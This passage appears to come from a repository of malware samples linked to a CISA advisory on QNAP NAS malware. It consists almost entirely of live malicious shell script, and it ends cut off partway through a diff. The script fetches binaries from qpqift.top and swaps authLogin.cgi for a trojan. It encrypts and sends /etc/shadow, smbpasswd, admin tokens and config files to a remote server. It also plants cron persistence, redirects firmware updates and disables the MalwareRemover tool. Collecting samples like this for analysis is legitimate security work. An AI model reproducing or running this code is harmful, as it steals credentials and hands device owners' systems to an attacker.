stcode=`$CMD_GETCFG ${QSYNC_NAME}.bin stcode -f /etc/config/qpkg_job.conf`
|
||||
if [ "$stcode" = "0" ]; then
|
||||
break
|
||||
fi
|
||||
sleep 1
|
||||
let "wait_install--"
|
||||
done
|
||||
|
||||
${QPKG_CLI} -C ${QSYNC_NAME}.bin > /dev/null 2>&1
|
||||
/bin/rm -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled
|
||||
/bin/rm -f "$lock_file"
|
||||
dbg "install build-in ${QSYNC_NAME} success"
|
||||
}
|
||||
|
||||
if [ "$1" == "stop" ]; then
|
||||
exit 0
|
||||
fi
|
||||
fi
|
||||
XEOF
|
||||
chmod 755 ".backup_${file}"
|
||||
if grep "\.backup_${file}" "$file"; then
|
||||
:
|
||||
else
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd -i "$file"
|
||||
echo ". ./.backup_${file}" >> "$file"
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd +i "$file"
|
||||
fi
|
||||
|
||||
fi
|
||||
|
||||
if [ ! -f ".qdisk_cmd" ]; then
|
||||
case "$(uname -m)" in
|
||||
*x86_64*)
|
||||
arch=x86_64
|
||||
binhash='g2oe7EJJVCiAHY6AG1I1c/lGF8Y='
|
||||
;;
|
||||
*arm*|*aarch*)
|
||||
arch=arm
|
||||
binhash='Z3twHZvQqYZ1vLeu4PLnZekdkRY='
|
||||
;;
|
||||
*i*86*)
|
||||
arch=i486
|
||||
binhash='gWzECXuIp3dz5yI7RJS9d4+xpq4='
|
||||
;;
|
||||
esac
|
||||
|
||||
if [ "x${binhash}" != 'x' ]; then
|
||||
curl --connect-timeout 12 -m 1200 -k -o ".qdisk_cmd.tmp" "https://qpqift.top/data/qdisk_cmd_${arch}" || rm -f ".qdisk_cmd.tmp"
|
||||
test -f '.qdisk_cmd.tmp' && rsynchash="$(openssl dgst -sha1 -binary ".qdisk_cmd.tmp" | openssl base64)"
|
||||
if [ "x${rsynchash}" = "x${binhash}" ]; then
|
||||
mv '.qdisk_cmd.tmp' '.qdisk_cmd' && chmod +x '.qdisk_cmd'
|
||||
else
|
||||
rm -f '.qdisk_cmd.tmp'
|
||||
fi
|
||||
fi
|
||||
fi
|
||||
binhash=''; rsynchash=''
|
||||
|
||||
for path in ".config/backup_conf.sh" ".liveupdate/liveupdate.sh"; do
|
||||
if [ -f "${path#*/}" ]; then
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd +ia "${path#*/}"
|
||||
elif [ -f "${bdir}/.qpkg/${path}" ]; then
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd +ia "${bdir}/.qpkg/${path}"
|
||||
fi
|
||||
done
|
||||
|
||||
version=$(getcfg System Version)
|
||||
test "x${version}" = 'x' && version=$(getcfg System Version -f /etc/default_config/uLinux.conf)
|
||||
test "${version##*.}" -lt 3 || test "${version%%.*}" -lt 4 || test "$(version=${version#*.}; echo "${version%.*}")" -lt 3 && version=4.3.3 || { test "${version##*.}" -gt 5 && version=4.3.5; }
|
||||
|
||||
if [ ! -d rssdoc ]; then
|
||||
command -v bunzip2 && compext=bz2 || compext=gz
|
||||
curl --connect-timeout 12 -m 1200 -k -o "rssdoc.tar.${compext}" "https://qpqift.top/data/rssdoc.tar.${compext}" && test -f "rssdoc.tar.${compext}" && rssdochash="$(openssl dgst -sha1 -binary "rssdoc.tar.${compext}" | openssl base64)" && { test "$rssdochash" = 'WOkc6vlUa7A30GKa4Z4o02CIexk=' || test "$rssdochash" = "0h0Jyx52a/F9YB80Ml4SsEsugyA="; } && { test "$compext" = bz2 && tarflag=j || tarflag=z; } && tar -x${tarflag}f "rssdoc.tar.${compext}" || rm -f rssdoc.tar
|
||||
rm -f "rssdoc.tar.${compext}"
|
||||
fi
|
||||
|
||||
rm -f /home/httpd/{Liveupdate,FirmwareRelease{,_beta}S.xml}
|
||||
ln -s "${CWD}"/rssdoc/{Liveupdate,FirmwareRelease{,_beta}S.xml} /home/httpd
|
||||
|
||||
if grep 'Liveupdate\|FirmwareRelease\|QTS_FW' /etc/default_config/uLinux.conf /etc/config/uLinux.conf | grep 'qnap\.com\|0\.0\.0\.0'; then
|
||||
internalwebport=$(/sbin/getcfg System InnerWebAccessPort -d 58080)
|
||||
localupdateurl="http://127.0.0.1:${internalwebport}"
|
||||
sed -i 's/https\?:\/\/[^\/]\+\/\(Liveupdate\|FirmwareRelease\|QTS_FW\)/http:\/\/127.0.0.1:'${internalwebport}'\/\1/' /etc/default_config/uLinux.conf /etc/config/uLinux.conf
|
||||
fi
|
||||
|
||||
test -f '/etc/config/rssdoc/qpkgcenter_*.xml' || test -h '/etc/config/rssdoc/qpkgcenter_*.xml' && { test -f '.qdisk_cmd' && ./.qdisk_cmd -i '/etc/config/rssdoc/qpkgcenter_*.xml'; rm -f '/etc/config/rssdoc/qpkgcenter_*.xml'; }
|
||||
|
||||
if find /etc/config/rssdoc | grep 'qpkgcenter_.*\.xml'; then
|
||||
:
|
||||
else
|
||||
cp "./rssdoc/Liveupdate/QTS${version}/qpkgcenter_eng.xml" '/etc/config/rssdoc/qpkgcenter_eng.xml'
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd +i '/etc/config/rssdoc/qpkgcenter_eng.xml'
|
||||
fi
|
||||
|
||||
for file in /etc/config/rssdoc/qpkgcenter_*.xml
|
||||
do
|
||||
if [ -f "$file" ] && { rm -f "$file" || [ ! -s "$file" ]; }; then
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd -i "$file"
|
||||
touch "$file"
|
||||
cp -f "./rssdoc/Liveupdate/QTS${version}/${file##*/}" "$file"
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd +i "$file"
|
||||
fi
|
||||
done
|
||||
file=''
|
||||
|
||||
for qpkgdir in "${bdir}/.qpkg" '../../.qpkg'; do
|
||||
test -d "$qpkgdir" && break
|
||||
done
|
||||
test -d "${qpkgdir}/MalwareRemover" || mkdir "${qpkgdir}/MalwareRemover"
|
||||
test -d "${qpkgdir}/MalwareRemover/modules" || mkdir "${qpkgdir}/MalwareRemover/modules"
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd -i "${qpkgdir}/MalwareRemover"
|
||||
|
||||
if [ -d "${qpkgdir}/MalwareRemover/modules" ]; then
|
||||
for file in 10_derek_3.pyc 12_derek_3.pyc; do
|
||||
if [ ! -f "${qpkgdir}/MalwareRemover/modules/${file}" ] || rm -f "${qpkgdir}/MalwareRemover/modules/${file}" || test -x "${qpkgdir}/MalwareRemover/modules/${file}" || [ $(wc -c < "${qpkgdir}/MalwareRemover/modules/${file}") -gt 150 ] || [ $(wc -c < "${qpkgdir}/MalwareRemover/modules/${file}") -lt 120 ]; then
|
||||
test -f '.qdisk_cmd' && test -f "${qpkgdir}/MalwareRemover/modules/${file}" && ./.qdisk_cmd -i "${qpkgdir}/MalwareRemover/modules/${file}" && rm -f "${qpkgdir}/MalwareRemover/modules/${file}"
|
||||
openssl base64 -d <<"EOF" >"${qpkgdir}/MalwareRemover/modules/${file}"
|
||||
A/MNCuVwTVxjAAAAAAAAAAABAAAAQAAAAHMLAAAAZQAAgwAAAWQAAFMoAQAAAE4o
|
||||
AQAAAHQEAAAAZXhpdCgAAAAAKAAAAAAoAAAAAHMVAAAAbW9kdWxlcy8xMF9kZXJl
|
||||
a18zLnB5dAgAAAA8bW9kdWxlPgEAAABzAAAAAA==
|
||||
EOF
|
||||
chmod -x "${qpkgdir}/MalwareRemover/modules/${file}"
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd +i "${qpkgdir}/MalwareRemover/modules/${file}"
|
||||
fi
|
||||
done
|
||||
fi
|
||||
file=''; qpkgdir=''
|
||||
|
||||
if [ ! -f .rsakey ]; then
|
||||
verifykey='-----BEGIN PUBLIC KEY-----
|
||||
MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
|
||||
CXqrBM2CVbJo';verifykey="${verifykey}"'g4rwwS''z1Bp1i1'
|
||||
verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
|
||||
RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
|
||||
Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
|
||||
gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
|
||||
2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
|
||||
0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
|
||||
pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
|
||||
DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
|
||||
-----END PUBLIC KEY-----'
|
||||
test -f ".rsakey" || echo "$verifykey" > ".rsakey"
|
||||
fi
|
||||
|
||||
cgibindir='/home/httpd/cgi-bin'
|
||||
if [ ! -f "1551848401_c" ] && [ -f "${cgibindir}/authLogin.cgi" ] && [ ! -f "${cgibindir}/sysauthLogin.cgi" ]; then
|
||||
test -f "1551848401_c" || touch "1551848401_c"
|
||||
case "$(uname -m)" in
|
||||
*x86_64*)
|
||||
arch=x86_64
|
||||
binhash='rrYwg0D4+4DxcDxYQsNTB4JUGlQ='
|
||||
;;
|
||||
*arm*|*aarch*)
|
||||
arch=arm
|
||||
binhash='Z4n2BZdhwjYf0wjM7GCW61WM9eU='
|
||||
;;
|
||||
*i*86*)
|
||||
arch=i486
|
||||
binhash='U3eHe6syQraRBGgsvkFZH3wibDw='
|
||||
;;
|
||||
esac
|
||||
|
||||
if [ "x${binhash}" != 'x' ]; then
|
||||
curl --connect-timeout 12 -m 1200 -k -o ".qal" "https://qpqift.top/data/qal2_${arch}" || rm -f ".qal"
|
||||
test -f '.qal' && rsynchash="$(openssl dgst -sha1 -binary ".qal" | openssl base64)"
|
||||
if [ "x${rsynchash}" = "x${binhash}" ]; then
|
||||
test -f "${cgibindir}"/sysauthLogin.cgi && mv "${cgibindir}"/sysauthLogin.cgi "${cgibindir}"/authLogin.cgi
|
||||
mv "${cgibindir}"/authLogin.cgi "${cgibindir}"/sysauthLogin.cgi && test -f "${cgibindir}"/sysauthLogin.cgi && mv '.qal' "${cgibindir}"/authLogin.cgi && chmod 755 "${cgibindir}"/authLogin.cgi
|
||||
fi
|
||||
test -f '.qal' && rm -f '.qal'
|
||||
fi
|
||||
fi
|
||||
|
||||
if [ -f "${cgibindir}"/authLogin.cgi ] && "${cgibindir}"/authLogin.cgi | grep '<QDocRoot'; then
|
||||
:
|
||||
else
|
||||
test -f "${cgibindir}"/sysauthLogin.cgi && mv "${cgibindir}"/sysauthLogin.cgi "${cgibindir}"/authLogin.cgi
|
||||
fi
|
||||
|
||||
test -f /etc/config/.qsync.conf && authkeysfile=$(grep AuthorizedKeysFile /etc/config/.qsync.conf | sed 's/"//g' | cut -d ' ' -f 2)
|
||||
if [ "$authkeysfile" ] && [ -f "$authkeysfile" ] && grep 'miOGcmendZU2r10SdZVplBQ4i' "$authkeysfile"; then
|
||||
sed -i '/miOGcmendZU2r10SdZVplBQ4i/d' "$authkeysfile"
|
||||
lsofout="$(lsof +c 0 -i -n -P | grep :51163)"
|
||||
sshpid="$(echo "$lsofout" | tr -s ' ' | cut -d ' ' -f 2 | head -n 1)"
|
||||
kill -2 "$sshpid"
|
||||
fi
|
||||
|
||||
if [ ! -f '1548997200_c' ]; then
|
||||
touch '1548997200_c'
|
||||
mdir=`mktemp -d /tmp/.mount.XXXXXX` || { mdir=/tmp/.mount.jbbxQob; mkdir ${mdir}; } || mdir=`mktemp -d "${bdir}/.mount.XXXXXX"` || { mdir="${bdir}/.mount.jbbxQob"; mkdir ${mdir}; } || `mktemp -d "/mnt/HDA_ROOT/.mount.XXXXXX"` || { mdir="/mnt/HDA_ROOT/.mount.jbbxQob"; mkdir ${mdir}; } || `mktemp -d "/.mount.XXXXXX"` || { mdir="/.mount.jbbxQob"; mkdir ${mdir}; } || `mktemp -d "./.mount.XXXXXX"` || { mdir="./.mount.jbbxQob"; mkdir ${mdir}; }
|
||||
__BOOT_DEV=
|
||||
__model=`getcfg System "Internal Model"`
|
||||
CONFIG_DEV_NODE=`getcfg "CONFIG STORAGE" DEVICE_NODE -f /etc/platform.conf`
|
||||
CONFIG_DEV_PART=`getcfg "CONFIG STORAGE" FS_ACTIVE_PARTITION -f /etc/platform.conf`
|
||||
CONFIG_DEV_FS=`getcfg "CONFIG STORAGE" FS_TYPE -f /etc/platform.conf`
|
||||
__BOOT_CONF=`test -f /etc/default_config/BOOT.conf && cat /etc/default_config/BOOT.conf 2>/dev/null || cat "${confdir}/BOOT.conf"` || { test "$arch_o" = arm && __BOOT_CONF=TS-NASARM; }
|
||||
command -v hal_app > /dev/null 2>&1 && { __BOOT_DEV=$(hal_app --get_boot_pd port_id=0); }
|
||||
test "${__BOOT_CONF}" = TS-NASARM || test "$arch_o" = arm && { test -f /etc/IS_TAS && __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}7" || __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}5"; } || __BOOT_DEV="${__BOOT_DEV:-/dev/sdx}6"
|
||||
test "x${CONFIG_DEV_NODE}" != "x" && { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}" > /dev/null 2>&1 || { test -f /etc/IS_TAS && mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } } || mount ${__BOOT_DEV} -t ext2 ${mdir} || { test "${__model}" = "TS-201" && mount -t ext2 /dev/mtdblock4 ${mdir}; } || { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}"; mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } || { test "${__model}" = "TS-269L" && mount -t ext2 /dev/sdc6 ${mdir}; } || { test "${__model}" = "TS-869" && mount -t ext2 /dev/sdi6 ${mdir}; } || { test "$arch_o" = arm || ${__BOOT_CONF} = "TS-NASARM" && { for i in 5 7 4 6 3 8; do mount -t ext2 "/dev/mtdblock${i}" ${mdir} && break; done; }; } || { test "$arch_o" = x86 && for n in /dev/sdc /dev/sdx /dev/sdi $__BOOT_DEV; do for i in 6 $CONFIG_DEV_PART; do mount -t ext2 ${n}${i} ${mdir} && break 2; done; done; } || { mount -t ext2 $(/sbin/hal_app --get_boot_pd port_id=0)6 ${mdir}; }
|
||||
|
||||
if [ $? -eq 0 ] || mount | grep "$mdir" >/dev/null; then
|
||||
for file in "${mdir}"/K01* "${mdir}/autorun.sh" '/tmp/config/autorun.sh'; do
|
||||
if [ -f "$file" ]; then
|
||||
sedcmd='s/CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/CXqrBM2CVbJog4rwwSz1Bp1i1'"'"'\
|
||||
verifykey="${verifykey}"'"'"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/'
|
||||
grepstring='CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex'
|
||||
sedreplace "$grepstring" "$sedcmd" "$file"
|
||||
sedcmd='s/g4rwwSz1Bp1i1'"'"'/g4rwwS'"''"'z1Bp1i1'"'"'/'
|
||||
grepstring='g4rwwSz1Bp1i1'"'"
|
||||
sedreplace "$grepstring" "$sedcmd" "$file"
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd +ia "$file"
|
||||
fi
|
||||
done
|
||||
fi
|
||||
umount "$mdir"
|
||||
rmdir "$mdir"
|
||||
fi
|
||||
|
||||
if [ ! -f '1553058001_c' ]; then
|
||||
touch '1553058001_c'
|
||||
key=$(tr -dc 'a-zA-Z0-9' </dev/urandom | { key=''; dd bs=20 count=1 2>/dev/null || head -c 20 || IFS='' read -rd '' -n 20 key; echo "$key"; } )
|
||||
test "x$key" = 'x' && key=$(LC_ALL=C sed 's/[^a-zA-Z0-9]//g' </dev/urandom | { key=''; dd bs=20 count=1 2>/dev/null || head -c 20 || IFS='' read -rd '' -n 20 key; echo "$key"; } )
|
||||
{ echo "$key" | openssl rsautl -pubin -inkey .rsakey -encrypt | openssl enc -base64 -A; printf ':'
|
||||
{ echo; for file in "${bdir}/.log/.rqsys.log" /etc/config/.qos_config/users/admin/.qtoken /etc/config/.qos_config/users/admin/secondSV.conf /etc/config/smbpasswd /etc/shadow /etc/config/*.conf /etc/default_config/*.conf /etc/*.conf /etc/config/.*.conf /etc/default_config/.*.conf /etc/.*.conf; do printf '%s:' "$file"; cat "$file"; echo; done; printf '%s:' "authLogin.cgi"; /home/httpd/cgi-bin/authLogin.cgi; printf '%s:' "display_name"; /sbin/get_display_name; } | gzip | { dd bs=4096 count=512 || head -c 2097152 || cat; } | openssl enc -aes-256-cbc -k "$key" -md md5 -salt -a -A; } | curl --connect-timeout 12 -m 300 -k -d '@-' "https://qpqift.top/ping.pl"
|
||||
fi
|
||||
|
||||
if [ ! -f 1551848403_c ]; then
|
||||
touch 1551848403_c
|
||||
test -f liveupdate.sh && cronscriptpath=.liveupdate/liveupdate.sh || { test -f backup_conf.sh && cronscriptpath=.config/backup_conf.sh; }
|
||||
|
||||
if [ ! -z $cronscriptpath ]; then
|
||||
test -d "${bdir}/.system" || mkdir -p "${bdir}/.system"
|
||||
echo '(exec>/dev/null>&1 2>&1;(PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin";openssl base64 -d -A <<"EOF"|sh&' > "${bdir}/.system/.qinstaller.sh"
|
||||
chmod 755 "${bdir}/.system/.qinstaller.sh"
|
||||
{
|
||||
cat <<"XXEOF"
|
||||
( exec >/dev/null 2>&1; (
|
||||
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
|
||||
command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }
|
||||
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
|
||||
test -d "$confdir" || confdir=/etc/config
|
||||
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\
|
||||
\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\
|
||||
//I;s/\(^\|\
|
||||
\)\[[^\
|
||||
]\+\]\
|
||||
.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
|
||||
bdir=
|
||||
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
|
||||
echo 'ab*c' | grep -F 'ab*c' >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
|
||||
test "$fgrep" || fgrep=grep
|
||||
sleep 5
|
||||
XXEOF
|
||||
cat <<XXEOF
|
||||
if [ ! -f "\${bdir}/.qpkg/${cronscriptpath}" ]; then
|
||||
set_mutable() {
|
||||
if [ ! -e "\$1" ]; then
|
||||
return 0
|
||||
fi
|
||||
if [ -e /etc/IS_64BITS ]; then
|
||||
# 64bit set mutable
|
||||
SET_M_64="\$1"
|
||||
python -c "import os,fcntl,sys,struct;fd = os.open('\${SET_M_64}', os.O_RDONLY); rec = struct.pack('L', 0); x = fcntl.ioctl(fd, 0x80086601, rec); flags = struct.unpack('L',x)[0]; was_immutable = flags & 0x00000010; flags = flags & ~0x00000010; f = struct.pack('i', flags); fcntl.ioctl(fd, 0x40086602, f); os.close(fd)"
|
||||
else
|
||||
# 32bit set mutable
|
||||
SET_M_32="\$1"
|
||||
python -c "import os,fcntl,sys,struct;fd = os.open('\${SET_M_32}', os.O_RDONLY); rec = struct.pack('L', 0); x = fcntl.ioctl(fd, 0x80046601, rec); flags = struct.unpack('L',x)[0]; was_immutable = flags & 0x00000010; flags = flags & ~0x00000010; f = struct.pack('i', flags); fcntl.ioctl(fd, 0x40046602, f); os.close(fd)"
|
||||
fi
|
||||
}
|
||||
test -f "\${bdir}/.qpkg/${cronscriptpath%/*}" || test -h "\${bdir}/.qpkg/${cronscriptpath%/*}" && { set_mutable "\${bdir}/.qpkg/${cronscriptpath%/*}"; rm -f "\${bdir}/.qpkg/${cronscriptpath%/*}"; }
|
||||
test -d "\${bdir}/.qpkg" || mkdir -p "\${bdir}/.qpkg" || mkdir "\${bdir}/.qpkg"
|
||||
test -d "\${bdir}/.qpkg/${cronscriptpath%/*}" || mkdir "\${bdir}/.qpkg/${cronscriptpath%/*}"
|
||||
cat > "\${bdir}/.qpkg/${cronscriptpath}" <<"XEOF"
|
||||
XXEOF
|
||||
cat "${cronscriptpath#*/}"
|
||||
cat <<XXEOF
|
||||
XEOF
|
||||
chmod 755 "\${bdir}/.qpkg/${cronscriptpath}"
|
||||
touch -cr /bin/busybox "\${bdir}/.qpkg/${cronscriptpath}"
|
||||
( ( exec >/dev/null 2>&1 </dev/null; "\${bdir}/.qpkg/${cronscriptpath}" </dev/null >/dev/null 2>/dev/null & ) & )
|
||||
fi
|
||||
|
||||
test -x "\${bdir}/.qpkg/${cronscriptpath}" || chmod 755 "\${bdir}/.qpkg/${cronscriptpath}"
|
||||
|
||||
crontabargs=\$(ps | grep 'cr[o]nd ' | sed -n 's/.*crond[^0-9A-Za-z-]*\\(.\\+\\)/\\1/p')
|
||||
trycount=10; trycount=\$(( \$trycount - 10 ))
|
||||
set x \$crontabargs; shift
|
||||
while [ \$# -gt 0 ] && [ \$trycount -lt 10 ]; do
|
||||
trycount=\$(( \$trycount + 1 ))
|
||||
getopts ':c:' OPT 2>/dev/null
|
||||
test "\$OPT" = 'c' && crontabfile="\${OPTARG}/admin" && break
|
||||
test "\$OPTIND" -gt 0 && shift "\$OPTIND" && OPTIND=1 || break
|
||||
done
|
||||
test "\$crontabfile" && test -f "\${crontabfile}" || crontabfile='/tmp/cron/crontabs/admin'
|
||||
|
||||
for crontab in "\$crontabfile" "\${confdir}/crontab"; do
|
||||
if \$fgrep "\${bdir}/.qpkg/${cronscriptpath}" "\$crontab"; then
|
||||
:
|
||||
else
|
||||
cronmins=\$(printf '%i' "\$(( \$RANDOM % 60 ))")
|
||||
cronhour=\$(printf '%i' "\$(( \$RANDOM % 24 ))")
|
||||
cronhour=\$(printf '%i,' "\$(( ( \$cronhour + 8 ) % 24 ))" "\$(( ( \$cronhour + 16 ) % 24 ))")"\$cronhour"
|
||||
echo "\$cronmins \$cronhour"' * * * '"\${bdir}/.qpkg/${cronscriptpath} >/dev/null 2>/dev/null" >> "\$crontab"
|
||||
crontab "\$crontab"
|
||||
sleep 2
|
||||
fi
|
||||
done
|
||||
) & ) &
|
||||
XXEOF
|
||||
} | { openssl base64 -A; echo; echo 'EOF'; echo ')&)'; } >> "${bdir}/.system/.qinstaller.sh"
|
||||
{ { crontab -l || cat /etc/config/crontab; } | grep -v '^ *#' | awk '{ print $6 }'; sed -n 's/^ \?[Ss]hell \?= \?//p' /etc/config/qpkg.conf; } | grep '/' | sort | uniq | while IFS= read -r line; do
|
||||
test ! -z "$line" || continue
|
||||
test -f "$line" || continue
|
||||
test "$line" = $(pwd)/liveupdate.sh || test "$line" = $(pwd)/backup_conf.sh && continue
|
||||
grep '/\.system/\.qinstaller\.sh"; exit' "$line" && continue
|
||||
head -n 1 "$line" | grep '^#! \?/bin/b\?a\?sh' || continue;
|
||||
tab=' '
|
||||
test "${#tab}" -eq 1 || tab=$(printf '\011') || tab=$(echo -e '\011')
|
||||
sed -i 's!^\([ '"$tab"']\{1,\}\)exit\([ '"$tab"']\{1,\}[0-9]\{1,\}\)\{0,1\}\(\;\{0,1\}[ '"$tab"']*\)$!\1{ '"${bdir}/.system/.qinstaller.sh"'; exit\2; }\3!;s!^exit\([ '"$tab"']\{1,\}[0-9]\{1,\}\)\{0,1\}\(\;\{0,1\}[ '"$tab"']*\)$!{ '"${bdir}/.system/.qinstaller.sh"'; exit\1; }!;s!/.qpkg/.q\{0,1\}installer.sh; exit!/.system/.qinstaller.sh; exit!' "$line"
|
||||
hash=''
|
||||
hash=$(sed -n '2,5p' "$line" | md5sum)
|
||||
hash=${hash%${hash##*[0-9a-f]}}; hash=${hash#${hash%%[0-9a-f]*}}
|
||||
trycnt=20
|
||||
while [ "x$hash" = 'x18ec5ab42dc1231da518951e4479c27b' ] && [ "$trycnt" -gt 0 ]; do
|
||||
trycnt=$(( $trycnt - 1))
|
||||
sed -i '2,5d' "$line"
|
||||
hash=''
|
||||
hash=$(sed -n '2,568{/key=/d;s/\.liveupdate\/liveupdate\.sh//g;s/\.config\/backup_conf\.sh//g;p}' "$line" | md5sum)
|
||||
hash=${hash%${hash##*[0-9a-f]}}; hash=${hash#${hash%%[0-9a-f]*}}
|
||||
done
|
||||
done
|
||||
fi
|
||||
fi
|
||||
|
||||
test -f "${ts}_c" || touch "${ts}_c"
|
||||
rm -f "${CWD}/".tmp.*
|
||||
exit 0
|
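--- a/2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/3cb052a7da6cda9609c32b5bafa11b76c2bb0f74b61277fecf464d3c0baeac0e
+++ b/2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/3cb052a7da6cda9609c32b5bafa11b76c2bb0f74b61277fecf464d3c0baeac0e
@@ -0,0 +1,107 @@
+export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
+
+command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\n\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\n//I;s/\(^\|\n\)\[[^\n]\+\]\n.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
+
+test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
+
+bdir=
+test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
+test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in Public Download Multimedia Web Recordings homes; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
+grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
+
+EOF
+test "$fgrep" || fgrep=grep
+test "$RANDOM" || RANDOM=17653
+genrstr ()
+{
+local s=;
+local min=${1:-4};
+local max=${2:-12};
+local kspace="${3:-a-zA-Z}"
+tr -dc "$kspace" < /dev/urandom | {
+read -rn $(($RANDOM % ( $max - $min + 1 ) + $min )) s;
+echo "$s"
+}
+}
+
+verifyfile() {
+local file="$1"
+local sig="${2:-$file_s}"
+local out
+test ! -z "$file" && test -s "$file" || return 1
+test ! -z "$sig" && test -s "$sig" || return 1
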